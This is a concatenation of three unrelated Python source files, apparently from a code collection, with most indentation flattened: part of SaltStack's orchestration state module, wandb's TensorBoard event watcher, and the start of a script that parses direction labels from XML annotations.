state_ret['comment'] = 'No highstate or sls specified, no execution made'
state_ret['result'] = False
return state_ret
if test is not None or __opts__.get('test'):
cmd_kw['kwarg']['test'] = test if test is not None else __opts__.get('test')
if pillar:
cmd_kw['kwarg']['pillar'] = pillar
if pillarenv is not None:
cmd_kw['kwarg']['pillarenv'] = pillarenv
if saltenv is not None:
cmd_kw['kwarg']['saltenv'] = saltenv
if exclude is not None:
cmd_kw['kwarg']['exclude'] = exclude
cmd_kw['kwarg']['queue'] = queue
if isinstance(concurrent, bool):
cmd_kw['kwarg']['concurrent'] = concurrent
else:
state_ret['comment'] = ('Must pass in boolean for value of \'concurrent\'')
state_ret['result'] = False
return state_ret
if batch is not None:
cmd_kw['batch'] = six.text_type(batch)
if subset is not None:
cmd_kw['subset'] = subset
masterless = __opts__['__role'] == 'minion' and \
__opts__['file_client'] == 'local'
if not masterless:
_fire_args({'type': 'state', 'tgt': tgt, 'name': name, 'args': cmd_kw})
cmd_ret = __salt__['saltutil.cmd'](tgt, fun, **cmd_kw)
else:
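        # Masterless path: call the state module locally, repacking the
        # positional arg as topfn/mods, and wrap the result so it looks like a
        # normal saltutil.cmd return keyed by this minion's id.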
if top:
cmd_kw['topfn'] = ''.join(cmd_kw.pop('arg'))
elif sls:
cmd_kw['mods'] = ''.join(cmd_kw.pop('arg'))
cmd_kw.update(cmd_kw.pop('kwarg'))
tmp_ret = __salt__[fun](**cmd_kw)
cmd_ret = {__opts__['id']: {
'ret': tmp_ret,
'out': tmp_ret.get('out', 'highstate') if
isinstance(tmp_ret, dict) else 'highstate'
}}
if cmd_kw['asynchronous']:
state_ret['__jid__'] = cmd_ret.get('jid')
state_ret['changes'] = cmd_ret
if int(cmd_ret.get('jid', 0)) > 0:
state_ret['result'] = True
state_ret['comment'] = 'State submitted successfully.'
else:
state_ret['result'] = False
state_ret['comment'] = 'State failed to run.'
return state_ret
try:
state_ret['__jid__'] = cmd_ret[next(iter(cmd_ret))]['jid']
except (StopIteration, KeyError):
pass
changes = {}
fail = set()
no_change = set()
if fail_minions is None:
fail_minions = ()
elif isinstance(fail_minions, six.string_types):
fail_minions = [minion.strip() for minion in fail_minions.split(',')]
elif not isinstance(fail_minions, list):
state_ret.setdefault('warnings', []).append(
'\'fail_minions\' needs to be a list or a comma separated '
'string. Ignored.'
)
fail_minions = ()
if not cmd_ret and expect_minions:
state_ret['result'] = False
state_ret['comment'] = 'No minions returned'
return state_ret
for minion, mdata in six.iteritems(cmd_ret):
if mdata.get('out', '') != 'highstate':
log.warning('Output from salt state not highstate')
m_ret = False
if 'return' in mdata and 'ret' not in mdata:
mdata['ret'] = mdata.pop('return')
m_state = True
if mdata.get('failed', False):
m_state = False
else:
try:
m_ret = mdata['ret']
except KeyError:
m_state = False
if m_state:
m_state = __utils__['state.check_result'](m_ret, recurse=True)
if not m_state:
if minion not in fail_minions:
fail.add(minion)
changes[minion] = m_ret
continue
try:
for state_item in six.itervalues(m_ret):
if isinstance(state_item, dict):
if 'changes' in state_item and state_item['changes']:
changes[minion] = m_ret
break
else:
no_change.add(minion)
except AttributeError:
log.error("m_ret did not have changes %s %s", type(m_ret), m_ret)
no_change.add(minion)
if changes:
state_ret['changes'] = {'out': 'highstate', 'ret': changes}
if len(fail) > allow_fail:
state_ret['result'] = False
state_ret['comment'] = 'Run failed on minions: {0}'.format(', '.join(fail))
else:
state_ret['comment'] = 'States ran successfully.'
if changes:
state_ret['comment'] += ' Updating {0}.'.format(', '.join(changes))
if no_change:
state_ret['comment'] += ' No changes made to {0}.'.format(', '.join(no_change))
if test or __opts__.get('test'):
if state_ret['changes'] and state_ret['result'] is True:
# Test mode with changes is the only case where result should ever be none
state_ret['result'] = None
return state_ret
def function(
name,
tgt,
ssh=False,
tgt_type='glob',
ret='',
ret_config=None,
ret_kwargs=None,
expect_minions=False,
fail_minions=None,
fail_function=None,
arg=None,
kwarg=None,
timeout=None,
batch=None,
subset=None,
**kwargs): # pylint: disable=unused-argument
'''
Execute a single module function on a remote minion via salt or salt-ssh
name
        The name of the function to run, e.g. cmd.run or pkg.install
    tgt
        The target specification, e.g. '*' for all minions
tgt_type
The target type, defaults to ``glob``
arg
The list of arguments to pass into the function
kwarg
The dict (not a list) of keyword arguments to pass into the function
ret
Optionally set a single or a list of returners to use
ret_config
Use an alternative returner configuration
ret_kwargs
Override individual returner configuration items
expect_minions
An optional boolean for failing if some minions do not respond
fail_minions
An optional list of targeted minions where failure is an option
fail_function
An optional string that points to a salt module that returns True or False
based on the returned data dict for individual minions
ssh
Set to `True` to use the ssh client instead of the standard salt client
batch
Execute the command :ref:`in batches <targeting-batch>`. E.g.: ``10%``.
subset
Number of minions from the targeted set to randomly use
.. versionadded:: 2017.7.0
asynchronous
Run the salt command but don't wait for a reply.
.. versionadded:: neon
'''
func_ret = {'name': name,
'changes': {},
'comment': '',
'result': True}
if kwarg is None:
kwarg = {}
if isinstance(arg, six.string_types):
func_ret['warnings'] = [
'Please specify \'arg\' as a list of arguments.'
]
arg = arg.split()
cmd_kw = {'arg': arg or [], 'kwarg': kwarg, 'ret': ret, 'timeout': timeout}
if batch is not None:
cmd_kw['batch'] = six.text_type(batch)
if subset is not None:
cmd_kw['subset'] = subset
cmd_kw['tgt_type'] = tgt_type
cmd_kw['ssh'] = ssh
cmd_kw['expect_minions'] = expect_minions
cmd_kw['_cmd_meta'] = True
cmd_kw['asynchronous'] = kwargs.pop('asynchronous', False)
if ret_config:
cmd_kw['ret_config'] = ret_config
if ret_kwargs:
cmd_kw['ret_kwargs'] = ret_kwargs
fun = name
if __opts__['test'] is True:
func_ret['comment'] = \
'Function {0} would be executed on target {1}'.format(fun, tgt)
func_ret['result'] = None
return func_ret
try:
_fire_args({'type': 'function', 'tgt': tgt, 'name': name, 'args': cmd_kw})
cmd_ret = __salt__['saltutil.cmd'](tgt, fun, **cmd_kw)
except Exception as exc:
func_ret['result'] = False
func_ret['comment'] = six.text_type(exc)
return func_ret
if cmd_kw['asynchronous']:
func_ret['__jid__'] = cmd_ret.get('jid')
func_ret['changes'] = cmd_ret
if int(cmd_ret.get('jid', 0)) > 0:
func_ret['result'] = True
func_ret['comment'] = 'Function submitted successfully.'
else:
func_ret['result'] = False
func_ret['comment'] = 'Function failed to run.'
return func_ret
try:
func_ret['__jid__'] = cmd_ret[next(iter(cmd_ret))]['jid']
except (StopIteration, KeyError):
pass
changes = {}
fail = set()
if fail_minions is None:
fail_minions = ()
elif isinstance(fail_minions, six.string_types):
fail_minions = [minion.strip() for minion in fail_minions.split(',')]
elif not isinstance(fail_minions, list):
func_ret.setdefault('warnings', []).append(
'\'fail_minions\' needs to be a list or a comma separated '
'string. Ignored.'
)
fail_minions = ()
for minion, mdata in six.iteritems(cmd_ret):
m_ret = False
if mdata.get('retcode'):
func_ret['result'] = False
fail.add(minion)
if mdata.get('failed', False):
m_func = False
else:
if 'return' in mdata and 'ret' not in mdata:
mdata['ret'] = mdata.pop('return')
m_ret = mdata['ret']
m_func = (not fail_function and True) or __salt__[fail_function](m_ret)
if m_ret is False:
m_func = False
if not m_func:
if minion not in fail_minions:
fail.add(minion)
changes[minion] = m_ret
if not cmd_ret:
func_ret['result'] = False
        func_ret['comment'] = 'No minions responded'
else:
if changes:
func_ret['changes'] = {'out': 'highstate', 'ret': changes}
if fail:
func_ret['result'] = False
func_ret['comment'] = 'Running function {0} failed on minions: {1}'.format(name, ', '.join(fail))
else:
func_ret['comment'] = 'Function ran successfully.'
if changes:
func_ret['comment'] += ' Function {0} ran on {1}.'.format(name, ', '.join(changes))
return func_ret
def wait_for_event(
name,
id_list,
event_id='id',
timeout=300,
node='master'):
'''
Watch Salt's event bus and block until a condition is met
.. versionadded:: 2014.7.0
name
An event tag to watch for; supports Reactor-style globbing.
id_list
A list of event identifiers to watch for -- usually the minion ID. Each
time an event tag is matched the event data is inspected for
``event_id``, if found it is removed from ``id_list``. When ``id_list``
is empty this function returns success.
event_id : id
The name of a key in the event data. Default is ``id`` for the minion
ID, another common value is ``name`` for use with orchestrating
salt-cloud events.
timeout : 300
The maximum time in seconds to wait before failing.
The following example blocks until all the listed minions complete a
restart and reconnect to the Salt master:
.. code-block:: yaml
reboot_all_minions:
salt.function:
- name: system.reboot
- tgt: '*'
wait_for_reboots:
salt.wait_for_event:
- name: salt/minion/*/start
- id_list:
- jerry
- stuart
- dave
- phil
- kevin
- mike
- require:
- salt: reboot_all_minions
'''
ret = {'name': name, 'changes': {}, 'comment': '', 'result': False}
if __opts__.get('test'):
ret['comment'] = \
'Orchestration would wait for event \'{0}\''.format(name)
ret['result'] = None
return ret
sevent = salt.utils.event.get_event(
node,
__opts__['sock_dir'],
__opts__['transport'],
opts=__opts__,
listen=True)
del_counter = 0
starttime = time.time()
timelimit = starttime + timeout
while True:
event = sevent.get_event(full=True)
is_timedout = time.time() > timelimit
if event is None and not is_timedout:
log.trace("wait_for_event: No event data; waiting.")
continue
elif event is None and is_timedout:
ret['comment'] = 'Timeout value reached.'
return ret
if fnmatch.fnmatch(event['tag'], name):
val = event['data'].get(event_id)
if val is None and 'data' in event['data']:
val = event['data']['data'].get(event_id)
if val is not None:
try:
val_idx = id_list.index(val)
except ValueError:
log.trace("wait_for_event: Event identifier '%s' not in "
"id_list; skipping.", event_id)
else:
del id_list[val_idx]
del_counter += 1
minions_seen = ret['changes'].setdefault('minions_seen', [])
minions_seen.append(val)
log.debug("wait_for_event: Event identifier '%s' removed "
"from id_list; %s items remaining.",
val, len(id_list))
else:
log.trace("wait_for_event: Event identifier '%s' not in event "
"'%s'; skipping.", event_id, event['tag'])
else:
log.debug("wait_for_event: Skipping unmatched event '%s'",
event['tag'])
if not id_list:
ret['result'] = True
ret['comment'] = 'All events seen in {0} seconds.'.format(
time.time() - starttime)
return ret
if is_timedout:
ret['comment'] = 'Timeout value reached.'
return ret
def runner(name, **kwargs):
'''
Execute a runner module on the master
.. versionadded:: 2014.7.0
name
The name of the function to run
kwargs
Any keyword arguments to pass to the runner function
asynchronous
Run the salt command but don't wait for a reply.
.. versionadded:: neon
.. code-block:: yaml
run-manage-up:
salt.runner:
- name: manage.up
'''
try:
jid = __orchestration_jid__
except NameError:
log.debug(
'Unable to fire args event due to missing __orchestration_jid__'
)
jid = None
if __opts__.get('test', False):
ret = {
'name': name,
'result': None,
'changes': {},
'comment': "Runner function '{0}' would be executed.".format(name)
}
return ret
out = __salt__['saltutil.runner'](name,
__orchestration_jid__=jid,
__env__=__env__,
full_return=True,
**kwargs)
if kwargs.get('asynchronous'):
out['return'] = out.copy()
out['success'] = 'jid' in out and 'tag' in out
runner_return = out.get('return')
if isinstance(runner_return, dict) and 'Error' in runner_return:
out['success'] = False
success = out.get('success', True)
ret = {'name': name,
'changes': {'return': runner_return},
'result': success}
ret['comment'] = "Runner function '{0}' {1}.".format(
name,
'executed' if success else 'failed',
)
ret['__orchestration__'] = True
if 'jid' in out:
ret['__jid__'] = out['jid']
return ret
def parallel_runners(name, runners, **kwargs): # pylint: disable=unused-argument
'''
Executes multiple runner modules on the master in parallel.
.. versionadded:: 2017.x.0 (Nitrogen)
A separate thread is spawned for each runner. This state is intended to be
used with the orchestrate runner in place of the ``saltmod.runner`` state
when different tasks should be run in parallel. In general, Salt states are
not safe when used concurrently, so ensure that they are used in a safe way
(e.g. by only targeting separate minions in parallel tasks).
name:
name identifying this state. The name is provided as part of the
output, but not used for anything else.
runners:
list of runners that should be run in parallel. Each element of the
list has to be a dictionary. This dictionary's name entry stores the
name of the runner function that shall be invoked. The optional kwarg
entry stores a dictionary of named arguments that are passed to the
runner function.
.. code-block:: yaml
parallel-state:
salt.parallel_runners:
- runners:
my_runner_1:
- name: state.orchestrate
- kwarg:
mods: orchestrate_state_1
my_runner_2:
- name: state.orchestrate
- kwarg:
mods: orchestrate_state_2
'''
# For the sake of consistency, we treat a single string in the same way as
# a key without a value. This allows something like
# salt.parallel_runners:
# - runners:
# state.orchestrate
# Obviously, this will only work if the specified runner does not need any
# arguments.
if isinstance(runners, six.string_types):
runners = {runners: [{name: runners}]}
# If the runners argument is not a string, it must be a dict. Everything
# else is considered an error.
if not isinstance(runners, dict):
return {
'name': name,
'result': False,
'changes': {},
'comment': 'The runners parameter must be a string or dict.'
}
# The configuration for each runner is given as a list of key-value pairs.
# This is not very useful for what we want to do, but it is the typical
# style used in Salt. For further processing, we convert each of these
# lists to a dict. This also makes it easier to check whether a name has
# been specified explicitly.
for runner_id, runner_config in six.iteritems(runners):
if runner_config is None:
runner_config = {}
else:
runner_config = salt.utils.data.repack_dictlist(runner_config)
if 'name' not in runner_config:
runner_config['name'] = runner_id
runners[runner_id] = runner_config
try:
jid = __orchestration_jid__
except NameError:
log.debug(
'Unable to fire args event due to missing __orchestration_jid__')
jid = None
def call_runner(runner_config):
return __salt__['saltutil.runner'](runner_config['name'],
__orchestration_jid__=jid,
__env__=__env__,
full_return=True,
**(runner_config.get('kwarg', {})))
try:
outputs = _parallel_map(call_runner, list(six.itervalues(runners)))
except salt.exceptions.SaltException as exc:
return {
'name': name,
'result': False,
'success': False,
'changes': {},
'comment': 'One of the runners raised an exception: {0}'.format(
exc)
}
# We bundle the results of the runners with the IDs of the runners so that
# we can easily identify which output belongs to which runner. At the same
    # time we extract the actual return value of the runner (saltutil.runner
# adds some extra information that is not interesting to us).
outputs = {
        runner_id: out['return'] for runner_id, out in
six.moves.zip(six.iterkeys(runners), outputs)
}
# If each of the runners returned its output in the format compatible with
# the 'highstate' outputter, we can leverage this fact when merging the
# outputs.
highstate_output = all(
[out.get('outputter', '') == 'highstate' and 'data' in out for out in
six.itervalues(outputs)]
)
# The following helper function is used to extract changes from highstate
# output.
def extract_changes(obj):
if not isinstance(obj, dict):
return {}
elif 'changes' in obj:
if (isinstance(obj['changes'], dict)
and obj['changes'].get('out', '') == 'highstate'
and 'ret' in obj['changes']):
return obj['changes']['ret']
else:
return obj['changes']
else:
found_changes = {}
for key, value in six.iteritems(obj):
change = extract_changes(value)
if change:
found_changes[key] = change
return found_changes
if highstate_output:
failed_runners = [runner_id for runner_id, out in
six.iteritems(outputs) if
out['data'].get('retcode', 0) != 0]
all_successful = not failed_runners
if all_successful:
comment = 'All runner functions executed successfully.'
else:
runner_comments = [
'Runner {0} failed with return value:\n{1}'.format(
runner_id,
salt.output.out_format(outputs[runner_id],
'nested',
__opts__,
nested_indent=2)
) for runner_id in failed_runners
]
comment = '\n'.join(runner_comments)
changes = {}
for runner_id, out in six.iteritems(outputs):
runner_changes = extract_changes(out['data'])
if runner_changes:
changes[runner_id] = runner_changes
else:
failed_runners = [runner_id for runner_id, out in
six.iteritems(outputs) if
out.get('exit_code', 0) != 0]
all_successful = not failed_runners
if all_successful:
comment = 'All runner functions executed successfully.'
else:
if len(failed_runners) == 1:
comment = 'Runner {0} failed.'.format(failed_runners[0])
else:
comment =\
'Runners {0} failed.'.format(', '.join(failed_runners))
changes = {'ret': {
runner_id: out for runner_id, out in six.iteritems(outputs)
}}
ret = {
'name': name,
'result': all_successful,
'changes': changes,
'comment': comment
}
# The 'runner' function includes out['jid'] as '__jid__' in the returned
# dict, but we cannot do this here because we have more than one JID if
# we have more than one runner.
return ret
def wheel(name, **kwargs):
'''
Execute a wheel module on the master
.. versionadded:: 2014.7.0
name
The name of the function to run
kwargs
Any keyword arguments to pass to the wheel function
asynchronous
Run the salt command but don't wait for a reply.
.. versionadded:: neon
.. code-block:: yaml
accept_minion_key:
salt.wheel:
- name: key.accept
- match: frank
'''
ret = {'name': name, 'result': False, 'changes': {}, 'comment': ''}
try:
jid = __orchestration_jid__
except NameError:
log.debug(
'Unable to fire args event due to missing __orchestration_jid__'
)
jid = None
if __opts__.get('test', False):
        ret['result'] = None
ret['changes'] = {}
ret['comment'] = "Wheel function '{0}' would be executed.".format(name)
return ret
out = __salt__['saltutil.wheel'](name,
__orchestration_jid__=jid,
__env__=__env__,
**kwargs)
if kwargs.get('asynchronous'):
        ret['__jid__'] = out.get('jid')
ret['changes'] = out
if int(out.get('jid', 0)) > 0:
ret['result'] = True
ret['comment'] = 'wheel submitted successfully.'
else:
ret['result'] = False
ret['comment'] = 'wheel failed to run.'
return ret
wheel_return = out.get('return')
if isinstance(wheel_return, dict) and 'Error' in wheel_return:
out['success'] = False
success = out.get('success', True)
ret = {'name': name,
'changes': {'return': wheel_return},
'result': success}
ret['comment'] = "Wheel function '{0}' {1}.".format(
name,
'executed' if success else 'failed',
)
ret['__orchestration__'] = True
if 'jid' in out:
ret['__jid__'] = out['jid']
return ret
|
tb_watcher.py
|
"""
tensorboard watcher.
"""
import glob
import logging
import os
import queue
import socket
import sys
import threading
import time
from typing import Any, TYPE_CHECKING
import wandb
from wandb import util
from wandb.sdk.interface.interface import GlobStr
from wandb.viz import CustomChart
from . import run as internal_run
if TYPE_CHECKING:
from ..interface.interface_queue import InterfaceQueue
from .settings_static import SettingsStatic
from typing import Dict, List, Optional
from wandb.proto.wandb_internal_pb2 import RunRecord
from wandb.sdk.interface.interface import FilesDict
from queue import PriorityQueue
from tensorboard.compat.proto.event_pb2 import ProtoEvent
from tensorboard.backend.event_processing.event_file_loader import EventFileLoader
HistoryDict = Dict[str, Any]
# Give some time for tensorboard data to be flushed
SHUTDOWN_DELAY = 5
ERROR_DELAY = 5
REMOTE_FILE_TOKEN = "://"
logger = logging.getLogger(__name__)
def _link_and_save_file(
path: str, base_path: str, interface: "InterfaceQueue", settings: "SettingsStatic"
) -> None:
# TODO(jhr): should this logic be merged with Run.save()
files_dir = settings.files_dir
file_name = os.path.relpath(path, base_path)
abs_path = os.path.abspath(path)
wandb_path = os.path.join(files_dir, file_name)
util.mkdir_exists_ok(os.path.dirname(wandb_path))
# We overwrite existing symlinks because namespaces can change in Tensorboard
if os.path.islink(wandb_path) and abs_path != os.readlink(wandb_path):
os.remove(wandb_path)
os.symlink(abs_path, wandb_path)
elif not os.path.exists(wandb_path):
os.symlink(abs_path, wandb_path)
# TODO(jhr): need to figure out policy, live/throttled?
interface.publish_files(dict(files=[(GlobStr(glob.escape(file_name)), "live")]))
def is_tfevents_file_created_by(path: str, hostname: str, start_time: float) -> bool:
"""Checks if a path is a tfevents file created by hostname.
tensorboard tfevents filename format:
https://github.com/tensorflow/tensorboard/blob/f3f26b46981da5bd46a5bb93fcf02d9eb7608bc1/tensorboard/summary/writer/event_file_writer.py#L81
    tensorflow tfevents filename format:
https://github.com/tensorflow/tensorflow/blob/8f597046dc30c14b5413813d02c0e0aed399c177/tensorflow/core/util/events_writer.cc#L68
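    For illustration, a (made-up) filename such as
    'events.out.tfevents.1630000000.myhost.1234.0' is split on '.'; the
    component right after 'tfevents' is the creation timestamp and the
    following components are matched against the hostname.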
"""
if not path:
raise ValueError("Path must be a nonempty string")
basename = os.path.basename(path)
if basename.endswith(".profile-empty") or basename.endswith(".sagemaker-uploaded"):
return False
fname_components = basename.split(".")
try:
tfevents_idx = fname_components.index("tfevents")
except ValueError:
return False
# check the hostname, which may have dots
for i, part in enumerate(hostname.split(".")):
try:
fname_component_part = fname_components[tfevents_idx + 2 + i]
except IndexError:
return False
if part != fname_component_part:
return False
try:
created_time = int(fname_components[tfevents_idx + 1])
except (ValueError, IndexError):
return False
# Ensure that the file is newer then our start time, and that it was
# created from the same hostname.
# TODO: we should also check the PID (also contained in the tfevents
# filename). Can we assume that our parent pid is the user process
# that wrote these files?
return created_time >= int(start_time) # noqa: W503
class TBWatcher:
_logdirs: "Dict[str, TBDirWatcher]"
_watcher_queue: "PriorityQueue"
def __init__(
self,
settings: "SettingsStatic",
run_proto: "RunRecord",
interface: "InterfaceQueue",
force: bool = False,
) -> None:
self._logdirs = {}
self._consumer: Optional[TBEventConsumer] = None
self._settings = settings
self._interface = interface
self._run_proto = run_proto
self._force = force
# TODO(jhr): do we need locking in this queue?
self._watcher_queue = queue.PriorityQueue()
wandb.tensorboard.reset_state()
def _calculate_namespace(self, logdir: str, rootdir: str) -> "Optional[str]":
namespace: "Optional[str]"
dirs = list(self._logdirs) + [logdir]
if os.path.isfile(logdir):
filename = os.path.basename(logdir)
else:
filename = ""
if rootdir == "":
rootdir = util.to_forward_slash_path(
os.path.dirname(os.path.commonprefix(dirs))
)
# Tensorboard loads all tfevents files in a directory and prepends
# their values with the path. Passing namespace to log allows us
# to nest the values in wandb
# Note that we strip '/' instead of os.sep, because elsewhere we've
# converted paths to forward slash.
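            # e.g. (hypothetical) logdir 'runs/exp/train' with rootdir
            # 'runs/exp' yields the namespace 'train'.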
namespace = logdir.replace(filename, "").replace(rootdir, "").strip("/")
# TODO: revisit this heuristic, it exists because we don't know the
# root log directory until more than one tfevents file is written to
if len(dirs) == 1 and namespace not in ["train", "validation"]:
namespace = None
else:
namespace = logdir.replace(filename, "").replace(rootdir, "").strip("/")
return namespace
def add(self, logdir: str, save: bool, root_dir: str) -> None:
logdir = util.to_forward_slash_path(logdir)
root_dir = util.to_forward_slash_path(root_dir)
if logdir in self._logdirs:
return
namespace = self._calculate_namespace(logdir, root_dir)
# TODO(jhr): implement the deferred tbdirwatcher to find namespace
if not self._consumer:
self._consumer = TBEventConsumer(
self, self._watcher_queue, self._run_proto, self._settings
)
self._consumer.start()
tbdir_watcher = TBDirWatcher(
self, logdir, save, namespace, self._watcher_queue, self._force
)
self._logdirs[logdir] = tbdir_watcher
tbdir_watcher.start()
def finish(self) -> None:
for tbdirwatcher in self._logdirs.values():
tbdirwatcher.shutdown()
for tbdirwatcher in self._logdirs.values():
tbdirwatcher.finish()
if self._consumer:
self._consumer.finish()
class TBDirWatcher:
def __init__(
self,
tbwatcher: "TBWatcher",
logdir: str,
save: bool,
namespace: "Optional[str]",
queue: "PriorityQueue",
force: bool = False,
) -> None:
self.directory_watcher = util.get_module(
"tensorboard.backend.event_processing.directory_watcher",
required="Please install tensorboard package",
)
# self.event_file_loader = util.get_module(
# "tensorboard.backend.event_processing.event_file_loader",
# required="Please install tensorboard package",
# )
self.tf_compat = util.get_module(
"tensorboard.compat", required="Please install tensorboard package"
)
self._tbwatcher = tbwatcher
self._generator = self.directory_watcher.DirectoryWatcher(
logdir, self._loader(save, namespace), self._is_our_tfevents_file
)
self._thread = threading.Thread(target=self._thread_except_body)
self._first_event_timestamp = None
self._shutdown = threading.Event()
self._queue = queue
self._file_version = None
self._namespace = namespace
self._logdir = logdir
self._hostname = socket.gethostname()
self._force = force
def start(self) -> None:
self._thread.start()
def _is_our_tfevents_file(self, path: str) -> bool:
"""Checks if a path has been modified since launch and contains tfevents"""
if not path:
raise ValueError("Path must be a nonempty string")
if self._force:
return True
path = self.tf_compat.tf.compat.as_str_any(path)
return is_tfevents_file_created_by(
path, self._hostname, self._tbwatcher._settings._start_time
)
    def _loader(self, save: bool = True, namespace: "Optional[str]" = None) -> "EventFileLoader":
"""Incredibly hacky class generator to optionally save / prefix tfevent files"""
_loader_interface = self._tbwatcher._interface
_loader_settings = self._tbwatcher._settings
try:
from tensorboard.backend.event_processing import event_file_loader
except ImportError:
raise Exception("Please install tensorboard package")
class EventFileLoader(event_file_loader.EventFileLoader):
def __init__(self, file_path: str) -> None:
super().__init__(file_path)
if save:
if REMOTE_FILE_TOKEN in file_path:
logger.warning(
"Not persisting remote tfevent file: %s", file_path
)
else:
# TODO: save plugins?
logdir = os.path.dirname(file_path)
parts = list(os.path.split(logdir))
if namespace and parts[-1] == namespace:
parts.pop()
logdir = os.path.join(*parts)
_link_and_save_file(
path=file_path,
base_path=logdir,
interface=_loader_interface,
settings=_loader_settings,
)
return EventFileLoader
def _process_events(self, shutdown_call: bool = False) -> None:
try:
for event in self._generator.Load():
self.process_event(event)
except (
self.directory_watcher.DirectoryDeletedError,
StopIteration,
RuntimeError,
OSError,
) as e:
# When listing s3 the directory may not yet exist, or could be empty
logger.debug("Encountered tensorboard directory watcher error: %s", e)
if not self._shutdown.is_set() and not shutdown_call:
time.sleep(ERROR_DELAY)
def _thread_except_body(self) -> None:
try:
self._thread_body()
except Exception as e:
logger.exception("generic exception in TBDirWatcher thread")
raise e
def _thread_body(self) -> None:
"""Check for new events every second"""
shutdown_time: "Optional[float]" = None
while True:
self._process_events()
if self._shutdown.is_set():
now = time.time()
if not shutdown_time:
shutdown_time = now + SHUTDOWN_DELAY
elif now > shutdown_time:
break
time.sleep(1)
def process_event(self, event: "ProtoEvent") -> None:
# print("\nEVENT:::", self._logdir, self._namespace, event, "\n")
if self._first_event_timestamp is None:
self._first_event_timestamp = event.wall_time
if event.HasField("file_version"):
self._file_version = event.file_version
if event.HasField("summary"):
self._queue.put(Event(event, self._namespace))
def shutdown(self) -> None:
self._process_events(shutdown_call=True)
self._shutdown.set()
def finish(self) -> None:
self.shutdown()
self._thread.join()
class Event:
"""An event wrapper to enable priority queueing"""
def __init__(self, event: "ProtoEvent", namespace: "Optional[str]"):
self.event = event
self.namespace = namespace
self.created_at = time.time()
def __lt__(self, other: "Event") -> bool:
if self.event.wall_time < other.event.wall_time:
return True
return False
class TBEventConsumer:
"""Consumes tfevents from a priority queue. There should always
only be one of these per run_manager. We wait for 10 seconds of queued
events to reduce the chance of multiple tfevent files triggering
out of order steps.
"""
def __init__(
self,
tbwatcher: TBWatcher,
queue: "PriorityQueue",
run_proto: "RunRecord",
settings: "SettingsStatic",
delay: int = 10,
) -> None:
self._tbwatcher = tbwatcher
self._queue = queue
self._thread = threading.Thread(target=self._thread_except_body)
self._shutdown = threading.Event()
self.tb_history = TBHistory()
self._delay = delay
# This is a bit of a hack to get file saving to work as it does in the user
# process. Since we don't have a real run object, we have to define the
# datatypes callback ourselves.
def datatypes_cb(fname: GlobStr) -> None:
files: "FilesDict" = dict(files=[(fname, "now")])
self._tbwatcher._interface.publish_files(files)
# this is only used for logging artifacts
self._internal_run = internal_run.InternalRun(run_proto, settings, datatypes_cb)
self._internal_run._set_internal_run_interface(self._tbwatcher._interface)
def start(self) -> None:
self._start_time = time.time()
self._thread.start()
def finish(self) -> None:
self._delay = 0
self._shutdown.set()
try:
event = self._queue.get(True, 1)
except queue.Empty:
event = None
if event:
self._handle_event(event, history=self.tb_history)
items = self.tb_history._get_and_reset()
for item in items:
self._save_row(
item,
)
self._thread.join()
def _thread_except_body(self) -> None:
try:
self._thread_body()
except Exception as e:
logger.exception("generic exception in TBEventConsumer thread")
raise e
def _thread_body(self) -> None:
while True:
try:
event = self._queue.get(True, 1)
# Wait self._delay seconds from consumer start before logging events
if (
time.time() < self._start_time + self._delay
and not self._shutdown.is_set()
):
self._queue.put(event)
time.sleep(0.1)
continue
except queue.Empty:
event = None
if self._shutdown.is_set():
break
if event:
self._handle_event(event, history=self.tb_history)
items = self.tb_history._get_and_reset()
for item in items:
self._save_row(
item,
)
# flush uncommitted data
self.tb_history._flush()
items = self.tb_history._get_and_reset()
for item in items:
self._save_row(item)
def _handle_event(self, event: "ProtoEvent", history: "TBHistory" = None) -> None:
wandb.tensorboard._log(
event.event,
step=event.event.step,
namespace=event.namespace,
history=history,
)
def _save_row(self, row: "HistoryDict") -> None:
chart_keys = set()
for k in row:
if isinstance(row[k], CustomChart):
chart_keys.add(k)
key = row[k].get_config_key(k)
value = row[k].get_config_value(
"Vega2", row[k].user_query(f"{k}_table")
)
row[k] = row[k]._data
self._tbwatcher._interface.publish_config(val=value, key=key)
for k in chart_keys:
row[f"{k}_table"] = row.pop(k)
self._tbwatcher._interface.publish_history(
row, run=self._internal_run, publish_step=False
)
class TBHistory:
_data: "HistoryDict"
_added: "List[HistoryDict]"
def __init__(self) -> None:
self._step = 0
self._step_size = 0
self._data = dict()
self._added = []
def _flush(self) -> None:
if not self._data:
return
# A single tensorboard step may have too much data
# we just drop the largest keys in the step if it does.
# TODO: we could flush the data across multiple steps
if self._step_size > util.MAX_LINE_BYTES:
metrics = [(k, sys.getsizeof(v)) for k, v in self._data.items()]
metrics.sort(key=lambda t: t[1], reverse=True)
bad = 0
dropped_keys = []
for k, v in metrics:
# TODO: (cvp) Added a buffer of 100KiB, this feels rather brittle.
if self._step_size - bad < util.MAX_LINE_BYTES - 100000:
break
else:
bad += v
dropped_keys.append(k)
del self._data[k]
wandb.termwarn(
"Step {} exceeds max data limit, dropping {} of the largest keys:".format(
self._step, len(dropped_keys)
)
)
print("\t" + ("\n\t".join(dropped_keys)))
self._data["_step"] = self._step
self._added.append(self._data)
self._step += 1
self._step_size = 0
def add(self, d: "HistoryDict") -> None:
self._flush()
self._data = dict()
self._data.update(self._track_history_dict(d))
def _track_history_dict(self, d: "HistoryDict") -> "HistoryDict":
e = {}
for k in d.keys():
e[k] = d[k]
self._step_size += sys.getsizeof(e[k])
return e
def _row_update(self, d: "HistoryDict") -> None:
self._data.update(self._track_history_dict(d))
def _get_and_reset(self) -> "List[HistoryDict]":
added = self._added[:]
self._added = []
return added
|
get_label_from_xml.py
|
# coding=utf-8
import xml.etree.ElementTree as ET
import sys
import os
import glob
import shutil
import cv2
from multiprocessing import Pool
from multiprocessing import Manager
from multiprocessing import Process
import numpy as np
import pickle
def restore_file(path):
df = open(path, 'rb')
file = pickle.load(df)
df.close()
return file
def save_file(file, path, protocol=None):
df = open(path, 'wb')
if protocol is None:
pickle.dump(file, df)
else:
pickle.dump(file, df, protocol=protocol)
df.close()
print('Successfully save ', path)
def get_direction(xml_path):
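    # Parse one annotation XML and return (rect, sums): rect maps each
    # direction flag (front/back/side/front_side/back_side/noise) to its
    # integer value, and sums is their total (0 -> unlabeled, >1 -> conflict).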
tree = ET.parse(xml_path)
rect={}
line=""
root = tree.getroot()
#for name in root.iter('path'):
# rect['path'] = os.path.basename(name.text)
def get_info(ob, name):
for front in ob.iter(name):
return int(front.text)
for ob in root.iter('attributes'):
rect['front'] = get_info(ob, 'front')
rect['back'] = get_info(ob, 'back')
rect['side'] = get_info(ob, 'side')
